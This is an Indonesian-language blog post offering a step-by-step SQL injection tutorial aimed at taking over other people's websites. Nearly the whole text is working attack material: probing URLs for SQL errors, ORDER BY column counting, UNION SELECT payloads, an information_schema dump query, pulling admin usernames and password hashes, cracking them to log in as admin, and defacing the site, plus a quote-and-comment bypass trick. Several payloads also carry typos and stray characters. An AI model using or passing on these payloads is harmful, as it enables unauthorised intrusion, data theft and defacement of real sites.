Tutorial SQL Injection step by step

Kali ini saya akan share Tutorial SQL Injection step by step dan sekaligus menjadi post pertama di blog ini :D

SQLI Step by step

Oke langsung saja

*Mencari Web Vuln :
1. Pastikan Errornya Bukan ODBC, Page NotFound, DLL . Tetapi Errornya "Error In Your SQL Syntax"

2. Taruh Tanda " ' " Pada Bagian Belakang Website, Example : http://www.target.com/index.php?id=123'

3. Jika Mengalami Error, Maka Website Tersebut Bisa Diambil Databasenya..

4. Untuk Mencari Jumlah Kolom Terakhir Bisa Ditambahkan Dengan "ORDER BY (number)--"
-> Example : http://www.target.com/index.php?id=123 ORDER BY 1--
http://www.target.com/index.php?id=123 ORDER BY 2--
http://www.target.com/index.php?id=123 ORDER BY 3--
http://www.target.com/index.php?id=123 ORDER BY 4--
http://www.target.com/index.php?id=123 ORDER BY 5--
http://www.target.com/index.php?id=123 ORDER BY 6--
http://www.target.com/index.php?id=123 ORDER BY7--
*Jadi Hasilnya Target Hanya Memiliki 6 Kolom Saja

5. Untuk Mencari Kolom yang Bisa kita ambil datanya bisa menggunakan syntax "-(number)+UNION+SELECT+(number)--"
-> Example :http://www.target.com/index.php?id=-123+UNION+SELECT+1,2,3,4,5,6--

6. Nanti Akan Keluar Sebuah Nomor Kolom yang Bisa Kita Ambil, Kita Asumsikan Saja Kolom 3 bisa Diambil data
7. Mencari Jenis Database Bisa kita gunakan "@@version" pada Kolom yang Bisa kita ambil data
-> Example : http://www.target.com/index.php?id=-123+UNION+SELECT+1,2,@@version,4,5,6--

8. Nanti Akan Keluar Jenis Versi Database Yang Digunakan Oleh Target tersebut (Hal ini biasanya bekerja pada versi database 5.* keatas.)
9. Nah sekarang kita cari langsung, tanpa panjang lebar ini syntax langsung mencari database/tabel/column. nih syntaxnya dibawah :
(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where?(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table?_schema,0x2f,table_name,0x2f,column_name))))x)
-> Example : http://www.target.com/index.php?id=-123+SELECT+UNION+1,2,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where?(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table?_schema,0x2f,table_name,0x2f,column_name))))x),4,5,6--

10. Mengambil Informasi Database : Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh dibawah :
http://www.target.com/index.php?id=-123 UNION SELECT 1,2,group_concat(Columnname,0x3a,columnname,0x3a),4,5,6 from databasename.tablename--
*Untuk Syntax Terakhir, Code Columnname, Databasename, Tablename harus diubah data yang kita dapatkan tadi. Contoh Column admin_user, admin_password; Databasename db_target; Tablename tbl_target
-> Example :http://www.target.com/index.php?id=-123 UNION SELECT 1,2,group_concat(admin_user,0x3a,admin_pass,0x3a),4,5,6 from db_target.tbl_target--

11. Sekarang anda akan mendapatkan informasi username & database, tinggal Decrypt Password md5, Find Admin Page. Login .. Taraaaaa. Anda Sudah Menjadi Admin di Target Tersebut..

12. Cara Nebas Indexnya jangan tanya ane soalnya setiap CMS beda-beda

Sekalian ane kasih tutorial buat bypass SQL Injection
1. Saat ente ingin cari nomer togel untuk di dumped databasenya sudah anda tulis sampe 100 tetapi masih tidak error -> Example : http://www.target.com/index.php?id=123 ORDER BY 100-- (kgk mungkin tabel sampai 100 lebih) .gimana caranya biar bisa di dumped ?
2. ente kasih tanda char ' dan - . masih kgk ngerti ? nih ane kasih contohnya dibawah
-> Example : http://www.target.com/index.php?id=123' ORDER BY 100-- -
nah baru enter, dan mengalami error
misalnya ente cari et dah ternyata nomer togelnya cuman 10 (contoh)
*Note : Bypass itu digunakan sampai last step